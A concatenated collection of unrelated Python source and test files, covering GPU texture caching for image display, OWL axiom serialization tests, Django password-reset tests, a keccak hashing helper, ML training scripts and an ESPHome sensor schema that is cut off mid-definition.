class ImageStoredOnGpu:
image_and_adjustments: ImageAndAdjustments
texture_id: TextureId
time_last_access: TimeSecond = -10000.
def __init__(self, image_and_adjustments: ImageAndAdjustments, time_last_access):
self.image_and_adjustments = image_and_adjustments
self.time_last_access = time_last_access
self.texture_id = _generate_texture_id()
AllTexturesDict = Dict[ImageAddress, ImageStoredOnGpu]
ALL_TEXTURES: AllTexturesDict = {}
def _to_rgb_image(img: Image_AnyType) -> Image_RGB:
img_rgb = None
if len(img.shape) >= 3:
channels = img.shape[2]
else:
channels = 1
if channels == 1:
if img.dtype == np.uint8:
img_rgb = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
elif img.dtype in [np.float32, np.float64]:
img_grey = np.uint8(img * 255.)
img_rgb = cv2.cvtColor(img_grey, cv2.COLOR_GRAY2BGR)
elif channels == 3:
if not img.dtype == np.uint8:
raise ValueError("imgui_cv does only support uint8 images with multiple channels")
img_rgb = img
elif channels == 4:
if not img.dtype == np.uint8:
raise ValueError("imgui_cv does only support uint8 images with multiple channels")
# we do not handle alpha very well...
img_rgb = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)
return img_rgb
NB_REFRESH_TEXTURES = 0
def _image_rgb_to_texture_impl(img_rgb: Image_RGB, texture_id: TextureId):
"""
Performs the actual transfer to the gpu and returns a texture_id
"""
# inspired from https://www.programcreek.com/python/example/95539/OpenGL.GL.glPixelStorei (example 3)
if LOG_GPU_USAGE:
global NB_REFRESH_TEXTURES
NB_REFRESH_TEXTURES = NB_REFRESH_TEXTURES + 1
print(f"NB_REFRESH_TEXTURES = {NB_REFRESH_TEXTURES}")
width = img_rgb.shape[1]
height = img_rgb.shape[0]
gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1)
gl.glBindTexture(gl.GL_TEXTURE_2D, texture_id)
gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1)
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_LINEAR)
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR)
gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl.GL_RGB, width, height, 0, gl.GL_BGR, gl.GL_UNSIGNED_BYTE, img_rgb)
gl.glBindTexture(gl.GL_TEXTURE_2D, 0)
return texture_id
def _image_to_texture(
image_and_adjustments: ImageAndAdjustments,
always_refresh: bool,
linked_user_image_address: ImageAddress
):
"""
_image_to_texture will transfer the image to the GPU and return a texture Id
Some GPU might choke if too many textures are transferred.
For this reason :
- a cache is maintained (ALL_TEXTURES)
- a quick comparison is made before the transfer:
@see _hash_image()
@see ImageAndAdjustments.__eq__() : for performance reasons, the __eq__ operator
is made to take only the hash into account.
:param image_and_adjustments:
:return: texture_id
"""
now = timer()
if linked_user_image_address == 0:
image_address = id(image_and_adjustments.image)
else:
image_address = linked_user_image_address
shall_refresh = False
if image_address not in ALL_TEXTURES:
ALL_TEXTURES[image_address] = ImageStoredOnGpu(image_and_adjustments, now)
shall_refresh = True
if always_refresh:
shall_refresh = True
image_stored_on_gpu: ImageStoredOnGpu = ALL_TEXTURES[image_address]
image_stored_on_gpu.time_last_access = now
if shall_refresh:
image_and_adjustments_copy = copy.deepcopy(image_and_adjustments)
img_adjusted = image_and_adjustments_copy.adjusted_image()
img_rgb = _to_rgb_image(img_adjusted)
_image_rgb_to_texture_impl(img_rgb, image_stored_on_gpu.texture_id)
return image_stored_on_gpu.texture_id
def _clear_all_cv_textures():
global ALL_TEXTURES
all_textures_updated = {}
textures_to_delete = []
now = timer()
for image_address, image_stored_on_gpu in ALL_TEXTURES.items():
age_seconds = now - image_stored_on_gpu.time_last_access
if age_seconds < 0.3:
all_textures_updated[image_address] = image_stored_on_gpu
else:
textures_to_delete.append(image_stored_on_gpu.texture_id)
ALL_TEXTURES = all_textures_updated
if len(textures_to_delete) > 0:
gl.glDeleteTextures(textures_to_delete)
# print("Delete {0} old texture(s), len={1}".format(len(textures_to_delete), len(ALL_TEXTURES)))
def _image_viewport_size(image, width=None, height=None):
image_width = image.shape[1]
image_height = image.shape[0]
if (width is not None) and (height is not None):
viewport_size = SizePixel(width, height)
elif width is not None:
viewport_size = SizePixel(width, round(image_height / image_width * width))
elif height is not None:
viewport_size = SizePixel(round(image_width / image_height * height), height)
else:
viewport_size = SizePixel.from_image(image)
return viewport_size
@static_vars(
zoomed_status={},
zoom_click_times={},
last_shown_image=None)
def _image_impl(
image_and_ajustments,
width=None, height=None, title="",
always_refresh = False,
linked_user_image_address: ImageAddress = 0
):
statics = _image_impl.statics
statics.last_shown_image = image_and_ajustments
zoom_key = imgui_ext.make_unique_label(title)
if zoom_key not in statics.zoomed_status:
statics.zoom_click_times[zoom_key] = 0
statics.zoomed_status[zoom_key] = False
if statics.zoomed_status[zoom_key]:
viewport_size = SizePixel.from_image(image_and_ajustments.image)
else:
viewport_size = _image_viewport_size(image_and_ajustments.image, width, height)
if zoom_key not in statics.zoomed_status:
statics.zoomed_status[zoom_key] = False
statics.zoom_click_times[zoom_key] = timer()
texture_id = _image_to_texture(
image_and_ajustments,
always_refresh = always_refresh,
linked_user_image_address=linked_user_image_address
)
if title == "":
imgui.image_button(texture_id, viewport_size.width, viewport_size.height, frame_padding=0)
is_mouse_hovering = imgui.is_item_hovered()
else:
imgui.begin_group()
imgui.image_button(texture_id, viewport_size.width, viewport_size.height, frame_padding=0)
is_mouse_hovering = imgui.is_item_hovered()
imgui.text(title)
imgui.end_group()
if is_mouse_hovering and imgui.get_io().mouse_down[0]:
last_time = statics.zoom_click_times[zoom_key]
now = timer()
if now - last_time > 0.3:
statics.zoomed_status[zoom_key] = not statics.zoomed_status[zoom_key]
statics.zoom_click_times[zoom_key] = now
return mouse_position_last_image()
def image(
img,
width=None,
height=None,
title="",
image_adjustments=None,
always_refresh = False,
linked_user_image_address: ImageAddress = 0
):
if image_adjustments is None:
image_adjustments = ImageAdjustments()
image_and_ajustments = ImageAndAdjustments(img, image_adjustments)
return _image_impl(
image_and_ajustments,
width=width, height=height,
title=title,
always_refresh = always_refresh,
linked_user_image_address = linked_user_image_address
)
def _is_in_image(pixel, image_shape):
# type : (imgui.Vec2, shape) -> Bool
w = image_shape[1]
h = image_shape[0]
x = pixel.x
y = pixel.y
return x >= 0 and x < w and y >= 0 and y < h
def _is_in_last_image(pixel):
last_image_shape = _image_impl.statics.last_shown_image.image.shape
return _is_in_image(pixel, last_image_shape)
def mouse_position_last_image():
io = imgui.get_io()
mouse = io.mouse_pos
rect_min = imgui.get_item_rect_min()
mouse_relative = imgui.Vec2(mouse.x - rect_min.x, mouse.y - rect_min.y)
if not _is_in_last_image(mouse_relative):
return None
else:
return mouse_relative
def is_mouse_hovering_last_image(): # only works if the image was presented in its original size
if not imgui.is_item_hovered_rect():
return False
mouse = mouse_position_last_image()
if mouse is None:
return False
else:
return True
def image_explorer(image, width=None, height=None, title="", zoom_key="", hide_buttons=False,
image_adjustments=None,
always_refresh = False
):
"""
:param image_adjustments:
:param hide_buttons:
:param image: opencv / np image.
:param width:
:param height:
:param title: an optional title
:param zoom_key: Set the same zoom_key for two image if you want to link their zoom settings
:return: mouse location in image coordinates (None if the mouse is outside of the image)
"""
if image_adjustments is None:
image_adjustments = ImageAdjustments()
from ._imgui_cv_zoom import image_explorer_autostore_zoominfo
viewport_size = _image_viewport_size(image, width, height)
imgui.begin_group()
mouse_location_original_image = image_explorer_autostore_zoominfo(
image,
viewport_size,
title,
zoom_key,
image_adjustments,
hide_buttons=hide_buttons,
always_refresh = always_refresh
)
imgui.end_group()
return mouse_location_original_image
|
116836
|
import unittest
def test_red():
pass
class AwesomeTestCase(unittest.TestCase):
def test_yellow(self):
pass
def test_green(self):
pass
def test_blue():
pass
|
116869
|
from mlflow.tracking.request_header.abstract_request_header_provider import RequestHeaderProvider
class PluginRequestHeaderProvider(RequestHeaderProvider):
"""RequestHeaderProvider provided through plugin system"""
def in_context(self):
return False
def request_headers(self):
return {"test": "header"}
|
116899
|
import os.path as osp
import shutil
import torch
from collections import OrderedDict
import json
class Saver(object):
def __init__(self, cfg):
self.cfg = cfg
self.checkpoint_dir = cfg["checkpoint_dir"]
self.export_dir = cfg["export_dir"]
def save_checkpoint(self, state, is_best, filename="checkpoint.pth.tar", save_model=True):
"""Saves checkpoint to disk"""
filename = osp.join(self.checkpoint_dir, filename)
if save_model: torch.save(state, filename)
if is_best:
best_pred = state["best_pred"]
with open(osp.join(self.export_dir, "best_pred.txt"), "w") as f:
json.dump(best_pred, f)
if save_model: shutil.copyfile(filename, osp.join(self.export_dir, "model_best.pth.tar"))
|
116913
|
from setuptools import setup, find_packages
setup(name='chi_annotator', version='1.0', packages=find_packages())
|
116939
|
import unittest
from rdflib import RDFS, Namespace
from funowl.annotations import Annotation
from funowl.class_axioms import SubClassOf, EquivalentClasses, DisjointClasses, DisjointUnion, HasKey
from funowl.class_expressions import ObjectIntersectionOf, ObjectSomeValuesFrom, ObjectUnionOf
from funowl.dataproperty_expressions import DataPropertyExpression
from funowl.objectproperty_expressions import ObjectPropertyExpression
from funowl.writers.FunctionalWriter import FunctionalWriter
from tests.utils.base import TestBase
SCT = Namespace("http://snomed.info/id/")
class ClassAxiomsTestCase(TestBase):
def setUp(self) -> None:
self.sw = FunctionalWriter()
self.sw.bind(None, SCT)
def test_equivalentclasses(self):
self.assertEqual("""EquivalentClasses(
:303394007
:45189000
:609096000
)""", str(EquivalentClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
with self.assertRaises(ValueError, msg="at least 2 arguments are required"):
str(EquivalentClasses( SCT['303394007']).to_functional(self.sw))
# Taken from SNOMED CT
self.assertEqual("""EquivalentClasses(
:303394007
ObjectIntersectionOf(
:45189000
ObjectSomeValuesFrom( :609096000 ObjectIntersectionOf(
ObjectSomeValuesFrom( :260686004 :129397003 )
ObjectSomeValuesFrom( :363700003 :52988006 )
ObjectSomeValuesFrom( :405813007 :69695003 )
) )
)
)""", str(EquivalentClasses(
SCT['303394007'],
ObjectIntersectionOf(
SCT['45189000'],
ObjectSomeValuesFrom(
SCT['609096000'],
ObjectIntersectionOf(
ObjectSomeValuesFrom(SCT['260686004'], SCT['129397003']),
ObjectSomeValuesFrom(SCT['363700003'], SCT['52988006']),
ObjectSomeValuesFrom(SCT['405813007'], SCT['69695003']))))).to_functional(self.sw.reset())))
def test_oio(self):
""" Bug: ObjectIntersectionOf ends up being a single argument to ObjectSomeValuesOf """
self.assertEqual("""ObjectIntersectionOf(
:45189000
ObjectSomeValuesFrom( :609096000 ObjectUnionOf(
:1
:2
) )
)""", str(ObjectIntersectionOf(
SCT['45189000'],
ObjectSomeValuesFrom(
SCT['609096000'],
ObjectUnionOf(
SCT['1'],
SCT['2']))).to_functional(self.sw.reset())))
def test_disjointclasses(self):
self.assertEqual("""DisjointClasses(
:303394007
:45189000
:609096000
)""", str(DisjointClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
def test_disjointunion(self):
self.assertEqual("""DisjointUnion( :12345
:303394007
:45189000
:609096000
)""", str(DisjointUnion(SCT['12345'], SCT['303394007'], SCT['45189000'], SCT['609096000']).
to_functional(self.sw.reset())))
with self.assertRaises(ValueError, msg="Have to have at least 2 expressions"):
DisjointUnion(SCT['12345'], SCT['303394007']).to_functional(self.sw)
def test_haskey(self):
self.assertEqual('''HasKey( :12345 (
:23456
:23457
) (
:23458
:23459
) )''', str(HasKey(SCT['12345'], ObjectPropertyExpression(SCT['23456']), ObjectPropertyExpression(SCT['23457']),
DataPropertyExpression(SCT['23458']), DataPropertyExpression(SCT['23459'])).to_functional(self.sw.reset())))
if __name__ == '__main__':
unittest.main()
|
116944
|
import torch
from torch import optim
from const import Phase
from batch import create_dataset
from models import Baseline
from sklearn.metrics import classification_report
def run(dataset_train,
dataset_dev,
dataset_test,
model_type,
word_embed_size,
hidden_size,
batch_size,
use_cuda,
n_epochs):
if model_type == 'base':
model = Baseline(vocab=dataset_train.vocab,
word_embed_size=word_embed_size,
hidden_size=hidden_size,
use_cuda=use_cuda,
inference=False)
else:
raise NotImplementedError
if use_cuda:
model = model.cuda()
optim_params = model.parameters()
optimizer = optim.Adam(optim_params, lr=10**-3)
print('start training')
for epoch in range(n_epochs):
train_loss, tokens, preds, golds = train(dataset_train,
model,
optimizer,
batch_size,
epoch,
Phase.TRAIN,
use_cuda)
dev_loss, tokens, preds, golds = train(dataset_dev,
model,
optimizer,
batch_size,
epoch,
Phase.DEV,
use_cuda)
logger = '\t'.join(['epoch {}'.format(epoch+1),
'TRAIN Loss: {:.9f}'.format(train_loss),
'DEV Loss: {:.9f}'.format(dev_loss)])
print('\r'+logger, end='')
test_loss, tokens, preds, golds = train(dataset_test,
model,
optimizer,
batch_size,
epoch,
Phase.TEST,
use_cuda)
print('====', 'TEST', '=====')
print_scores(preds, golds)
output_results(tokens, preds, golds)
def train(dataset,
model,
optimizer,
batch_size,
n_epoch,
phase,
use_cuda):
total_loss = 0.0
tokens = []
preds = []
labels = []
if phase == Phase.TRAIN:
model.train()
else:
model.eval()
for batch in dataset.batch_iter:
token = getattr(batch, 'token')
label = getattr(batch, 'label')
if use_cuda:
raw_sentences = dataset.get_raw_sentence(token.data.cpu().numpy())
else:
raw_sentences = dataset.get_raw_sentence(token.data.numpy())
loss, pred = \
model(token, raw_sentences, label, phase)
if phase == Phase.TRAIN:
optimizer.zero_grad()
torch.nn.utils.clip_grad_norm(model.parameters(), max_norm=5)
loss.backward()
optimizer.step()
# remove PAD from input sentences/labels and results
mask = (token != dataset.pad_index)
length_tensor = mask.sum(1)
if use_cuda:
length_tensor = length_tensor.data.cpu().numpy()
else:
length_tensor = length_tensor.data.numpy()
for index, n_tokens_in_the_sentence in enumerate(length_tensor):
if n_tokens_in_the_sentence > 0:
tokens.append(raw_sentences[index][:n_tokens_in_the_sentence])
_label = label[index][:n_tokens_in_the_sentence]
_pred = pred[index][:n_tokens_in_the_sentence]
if use_cuda:
_label = _label.data.cpu().numpy()
_pred = _pred.data.cpu().numpy()
else:
_label = _label.data.numpy()
_pred = _pred.data.numpy()
labels.append(_label)
preds.append(_pred)
total_loss += loss.data.mean()
return total_loss, tokens, preds, labels
def read_two_cols_data(fname):
data = {}
tokens = []
labels = []
token = []
label = []
with open(fname, mode='r') as f:
for line in f:
line = line.strip().lower().split()
if line:
try:
_token, _label = line
except ValueError:
raise
token.append(_token)
if _label == '0' or _label == '1':
label.append(int(_label))
else:
if _label == 'del':
label.append(1)
else:
label.append(0)
else:
tokens.append(token)
labels.append(label)
token = []
label = []
data['tokens'] = tokens
data['labels'] = labels
return data
def load(train_path, dev_path, test_path, batch_size, device):
train = read_two_cols_data(train_path)
dev = read_two_cols_data(dev_path)
test = read_two_cols_data(test_path)
data = {Phase.TRAIN: train, Phase.DEV: dev, Phase.TEST: test}
return create_dataset(data, batch_size=batch_size, device=device)
def print_scores(preds, golds):
_preds = [label for sublist in preds for label in sublist]
_golds = [label for sublist in golds for label in sublist]
target_names = ['not_del', 'del']
print(classification_report(_golds, _preds, target_names=target_names, digits=5))
def output_results(tokens, preds, golds, path='./result/sentcomp'):
with open(path+'.original.txt', mode='w') as w, \
open(path+'.gold.txt', mode='w') as w_gold, \
open(path+'.pred.txt', mode='w') as w_pred:
for _tokens, _golds, _preds in zip(tokens, golds, preds):
for token, gold, pred in zip(_tokens, _golds, _preds):
w.write(token + ' ')
if gold == 0:
w_gold.write(token + ' ')
# 0 -> keep, 1 -> delete
if pred == 0:
w_pred.write(token + ' ')
w.write('\n')
w_gold.write('\n')
w_pred.write('\n')
|
116980
|
from django.conf import settings
from django.core import mail
from django.urls import reverse
from django.utils.html import escape
from lib.tests.utils import BasePermissionTest, ClientTest
class PermissionTest(BasePermissionTest):
def test_password_reset(self):
url = reverse('password_reset')
template = 'registration/password_reset_form.html'
# Page should be usable while signed out, since the point of the page
# is to help people trying to sign in. Also usable while signed in;
# not a big use case, but doesn't hurt.
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
def test_password_reset_done(self):
url = reverse('password_reset_done')
template = 'registration/password_reset_done.html'
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
def test_password_reset_confirm(self):
url = reverse('password_reset_confirm', args=['a', 'a-a'])
template = 'registration/password_reset_confirm.html'
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
def test_password_reset_complete(self):
url = reverse('password_reset_complete')
template = 'registration/password_reset_complete.html'
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
class PasswordResetTest(ClientTest):
@classmethod
def setUpTestData(cls):
# Call the parent's setup (while still using this class as cls)
super().setUpTestData()
cls.user = cls.create_user(
username='sampleUsername', password='<PASSWORD>',
email='<EMAIL>')
def submit_and_get_reset_link(self):
"""Shortcut function for tests focusing on the final reset step."""
self.client.post(reverse('password_reset'), dict(
email='<EMAIL>'))
instructions_email = mail.outbox[-1]
# Reset link: should be the first link (first "word" with '://')
# in the email.
reset_link = None
for word in instructions_email.body.split():
if '://' in word:
reset_link = word
break
self.assertIsNotNone(reset_link)
return reset_link
def test_submit(self):
response = self.client.post(
reverse('password_reset'),
dict(email='<EMAIL>'), follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_done.html')
# Email should've been sent.
self.assertEqual(len(mail.outbox), 1)
def test_submit_with_nonexistent_email(self):
"""Even if the email address is not in CoralNet's database, this form
should still submit successfully - with the usual wording to the effect
of 'we've sent an email, if our DB has this address'. This way,
snoopers can't check if an arbitrary email address (which they
don't own) is in the database or not."""
response = self.client.post(
reverse('password_reset'),
dict(email='<EMAIL>'), follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_done.html')
# Since our DB does not have this address, we won't actually send an
# email.
self.assertEqual(len(mail.outbox), 0)
def test_submit_with_empty_email(self):
response = self.client.post(
reverse('password_reset'),
dict(), follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_form.html')
self.assertContains(
response,
"This field is required.")
def test_submit_instructions_email_details(self):
self.client.post(reverse('password_reset'), dict(
email='<EMAIL>'))
instructions_email = mail.outbox[-1]
self.assertListEqual(
instructions_email.to, ['<EMAIL>'],
"Recipients should be correct")
self.assertListEqual(instructions_email.cc, [], "cc should be empty")
self.assertListEqual(instructions_email.bcc, [], "bcc should be empty")
self.assertIn(
"Reset your password", instructions_email.subject,
"Subject template should be correct, based on subject text")
self.assertIn(
"you requested a password reset",
instructions_email.body,
"Email body template should be correct, based on body text")
self.assertIn(
self.user.username, instructions_email.body,
"Username should be in the email body")
self.assertIn(
settings.ACCOUNT_QUESTIONS_LINK, instructions_email.body,
"Account questions link should be in the email body")
def test_reset(self):
reset_link = self.submit_and_get_reset_link()
# Navigate to the reset link.
response = self.client.get(reset_link, follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
# We actually got redirected to a different URL without the pass-reset
# token (for security purposes), so we need to get that URL for the
# next step.
reset_redirect_url = response.wsgi_request.path
# Complete the password reset.
response = self.client.post(
reset_redirect_url,
dict(
new_password1='<PASSWORD>',
new_password2='<PASSWORD>',
),
follow=True,
)
self.assertTemplateUsed(
response, 'registration/password_reset_complete.html')
# Check that the password has changed: attempt to log in with the
# new password, and check that we're signed in as the expected user.
self.client.logout()
self.client.login(
username='sampleUsername', password='<PASSWORD>')
self.assertIn('_auth_user_id', self.client.session)
self.assertEqual(
int(self.client.session['_auth_user_id']), self.user.pk)
def test_reset_with_password_mismatch(self):
reset_link = self.submit_and_get_reset_link()
# Navigate to the reset link.
response = self.client.get(reset_link, follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
reset_redirect_url = response.wsgi_request.path
# Submit the password reset form with a password mismatch.
response = self.client.post(
reset_redirect_url,
dict(
new_password1='<PASSWORD>',
new_password2='<PASSWORD>',
),
follow=True,
)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
self.assertContains(
response,
escape("The two password fields didn't match."))
# Check that the password has not changed.
self.client.logout()
self.client.login(username='sampleUsername', password='<PASSWORD>')
self.assertIn('_auth_user_id', self.client.session)
self.assertEqual(
int(self.client.session['_auth_user_id']), self.user.pk)
def test_reset_with_invalid_password(self):
reset_link = self.submit_and_get_reset_link()
# Navigate to the reset link.
response = self.client.get(reset_link, follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
reset_redirect_url = response.wsgi_request.path
# Submit the password reset form with an invalid password.
response = self.client.post(
reset_redirect_url,
dict(
new_password1='<PASSWORD>',
new_password2='<PASSWORD>',
),
follow=True,
)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
self.assertContains(
response,
"This password is too short. It must contain at least"
" 10 characters.")
# Check that the password has not changed.
self.client.logout()
self.client.login(username='sampleUsername', password='<PASSWORD>')
self.assertIn('_auth_user_id', self.client.session)
self.assertEqual(
int(self.client.session['_auth_user_id']), self.user.pk)
|
116986
|
class MomentumGradientDescent(GradientDescent):
def __init__(self, params, lr=0.1, momentum=.9):
super(MomentumGradientDescent, self).__init__(params, lr)
self.momentum = momentum
self.velocities = [torch.zeros_like(param, requires_grad=False)
for param in params]
def step(self):
with torch.no_grad():
for i, (param, velocity) in enumerate(zip(self.params,
self.velocities)):
velocity = self.momentum * velocity + param.grad
param -= self.lr * velocity
self.velocities[i] = velocity
|
116992
|
from __future__ import annotations
import typing
from typing_extensions import Literal
from ctc import spec
from . import formats
@typing.overload
def keccak(
data: spec.BinaryInteger,
output_format: Literal['integer'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> int:
...
@typing.overload
def keccak(
data: spec.BinaryInteger,
output_format: Literal['binary'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> bytes:
...
@typing.overload
def keccak(
data: spec.BinaryInteger,
output_format: Literal['prefix_hex', 'raw_hex', None] = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> str:
...
def keccak(
data: spec.BinaryInteger,
output_format: typing.Optional[spec.BinaryFormat] = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> spec.BinaryInteger:
"""return keccack-256 hash of hex or binary data"""
# determine library
if library is None:
try:
import sha3 # type: ignore
library = 'pysha3'
except ImportError:
library = 'pycryptodome'
# convert data to binary
data = formats.convert(data, 'binary')
if library == 'pysha3':
import sha3 # type: ignore
binary = sha3.keccak_256(data).digest()
elif library == 'pycryptodome':
from Crypto.Hash import keccak as f_keccak
binary = f_keccak.new(digest_bits=256, data=data).digest()
else:
raise Exception(
'must choose valid library, either \'pysha3\' or \'pycryptodome\''
)
return formats.convert(binary, output_format)
@typing.overload
def keccak_text(
text: typing.Union[str, bytes],
output_format: Literal['integer'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> int:
...
@typing.overload
def keccak_text(
text: typing.Union[str, bytes],
output_format: Literal['binary'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> bytes:
...
@typing.overload
def keccak_text(
text: typing.Union[str, bytes],
output_format: Literal['prefix_hex', 'raw_hex'] = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> str:
...
def keccak_text(
text: typing.Union[str, bytes],
output_format: spec.BinaryFormat = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> spec.BinaryInteger:
"""return keccack-256 hash of text"""
if isinstance(text, str):
text = text.encode()
return keccak(text, output_format=output_format, library=library)
|
116996
|
import looptime
def test_time_proxy_math():
proxy = looptime.LoopTimeProxy(looptime.new_event_loop(start=123.456))
assert str(proxy) == '123.456'
assert int(proxy) == 123
assert float(proxy) == 123.456
assert proxy == 123.456
assert not proxy == 456.123
assert proxy != 456.123
assert not proxy != 123.456
assert proxy > 122
assert proxy < 124
assert proxy >= 122
assert proxy <= 124
assert not proxy < 122
assert not proxy > 124
assert not proxy <= 122
assert not proxy >= 124
assert not proxy > 123.456
assert not proxy < 123.456
assert proxy >= 123.456
assert proxy <= 123.456
assert proxy + 1.2 == 124.656
assert proxy - 1.2 == 122.256
assert proxy * 1.2 == 148.1472
# The following values cause floating point precision errors if not adjusted:
# 123.456 / 1.2 => 102.88000000000001
# 123.456 % 1.2 => 1.0560000000000076
# We also test for floating point resolution here:
assert proxy / 1.2 == 102.88
assert proxy // 1.2 == 102.0
assert proxy % 1.2 == 1.056
assert round(proxy ** 1.2, 6) == 323.455576 # approximately
def test_resolution_ignores_extra_precision():
proxy = looptime.LoopTimeProxy(looptime.new_event_loop(start=123.456789), resolution=.001)
assert str(proxy) == '123.457'
assert int(proxy) == 123
assert float(proxy) == 123.457
assert proxy == 123.457
assert proxy == 123.457111
assert proxy == 123.456999
# assume that other operations use the same rounding logic.
def test_loop_attachement():
loop1 = looptime.new_event_loop(start=123.456)
loop2 = looptime.new_event_loop(start=456.123)
proxy = looptime.LoopTimeProxy(loop1)
assert proxy == 123.456
assert proxy @ loop1 == 123.456
assert proxy @ loop2 == 456.123
|
117033
|
from armulator.armv6.opcodes.abstract_opcodes.ubfx import Ubfx
from armulator.armv6.opcodes.opcode import Opcode
class UbfxT1(Ubfx, Opcode):
def __init__(self, instruction, lsbit, widthminus1, d, n):
Opcode.__init__(self, instruction)
Ubfx.__init__(self, lsbit, widthminus1, d, n)
def is_pc_changing_opcode(self):
return False
@staticmethod
def from_bitarray(instr, processor):
widthm1 = instr[27:32]
imm2 = instr[24:26]
rd = instr[20:24]
imm3 = instr[17:20]
rn = instr[12:16]
lsbit = (imm3 + imm2).uint
if rd.uint in (13, 15) or rn.uint in (13, 15):
print "unpredictable"
else:
return UbfxT1(instr, **{"lsbit": lsbit, "widthminus1": widthm1.uint, "d": rd.uint, "n": rn.uint})
|
117057
|
from aydin.util.misc.combinatorics import closest_product
def test_closest_product():
u = [1, 2, 5, 7, 9, 10]
N = 15
result = closest_product(u, N)
print(f"closest_product({u}, {N}) = {result}")
assert result == [1, 3]
N = 27
result = closest_product(u, N)
print(f"closest_product({u}, {N}) = {result}")
assert result is None
|
117066
|
import dnacauldron as dc
repository = dc.SequenceRepository()
repository.import_records(files=["gibson_sequences.fa"])
assembly_plan = dc.AssemblyPlan.from_spreadsheet(
assembly_class=dc.GibsonAssembly, path="gibson_assembly.csv"
)
plan_simulation = assembly_plan.simulate(sequence_repository=repository)
print("Assembly stats:", plan_simulation.compute_stats())
report_writer = dc.AssemblyReportWriter(
include_mix_graphs=True,
include_assembly_plots=True,
show_overhangs_in_graph=True,
annotate_parts_homologies=True,
)
plan_simulation.write_report(
target="output", assembly_report_writer=report_writer
)
|
117089
|
from typing import Optional, Dict, TYPE_CHECKING
from algorithms.configuration.entities.agent import Agent
from algorithms.configuration.entities.entity import Entity
from algorithms.configuration.entities.extended_wall import ExtendedWall
from algorithms.configuration.entities.goal import Goal
from algorithms.configuration.entities.obstacle import Obstacle
from algorithms.configuration.entities.trace import Trace
from algorithms.configuration.maps.map import Map
from simulator.services.services import Services
from simulator.views.map.display.map_display import MapDisplay
from simulator.views.map.data.voxel_map import VoxelMap
from structures import DynamicColour, Colour, Point
if TYPE_CHECKING:
from simulator.views.map.map_view import MapView
class EntitiesMapDisplay(MapDisplay):
__cube_colours: Dict[Point, Colour]
__agent_colour: DynamicColour
__trace_colour: DynamicColour
__goal_colour: DynamicColour
def __init__(self, services: Services, z_index=100, custom_map: Map = None) -> None:
super().__init__(services, z_index=z_index, custom_map=custom_map)
self.__agent_colour = self._services.state.views.effective_view.colours[VoxelMap.AGENT]
self.__trace_colour = self._services.state.views.effective_view.colours[VoxelMap.TRACE]
self.__goal_colour = self._services.state.views.effective_view.colours[VoxelMap.GOAL]
self.__cube_colours = {}
self.updates_cubes = True
def render(self, *discarded) -> None:
rv = self.get_renderer_view()
for p in self.__cube_colours:
rv.cube_requires_update(p)
self.__cube_colours.clear()
p3 = rv.to_point3
self.__cube_colours[p3(self._map.agent)] = self.__agent_colour()
self.__cube_colours[p3(self._map.goal)] = self.__goal_colour()
tc = self.__trace_colour()
for trace_point in self._map.trace:
self.__cube_colours[p3(trace_point)] = tc
if len(self._map.trace) >= 1:
self.__cube_colours[p3(Entity(self._map.trace[0].position, self._map.agent.radius))] = self.__agent_colour()
for p in self.__cube_colours:
rv.cube_requires_update(p)
def update_cube(self, p: Point) -> None:
if p in self.__cube_colours:
self.get_renderer_view().colour_cube(self.__cube_colours[p])
def request_update_all_cubes(self) -> None:
rv = self.get_renderer_view()
for p in self.__cube_colours:
rv.cube_requires_update(p)
|
117170
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import pins
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_CLOCK_PIN,
CONF_DATA_PIN,
CONF_CO2,
CONF_TEMPERATURE,
CONF_HUMIDITY,
DEVICE_CLASS_CARBON_DIOXIDE,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
STATE_CLASS_MEASUREMENT,
UNIT_PARTS_PER_MILLION,
UNIT_CELSIUS,
UNIT_PERCENT,
ICON_MOLECULE_CO2,
)
from esphome.cpp_helpers import gpio_pin_expression
zyaura_ns = cg.esphome_ns.namespace("zyaura")
ZyAuraSensor = zyaura_ns.class_("ZyAuraSensor", cg.PollingComponent)
CONFIG_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.declare_id(ZyAuraSensor),
cv.Required(CONF_CLOCK_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Required(CONF_DATA_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Optional(CONF_CO2): sensor.sensor_schema(
unit_of_measurement=UNIT_PARTS_PER_MILLION,
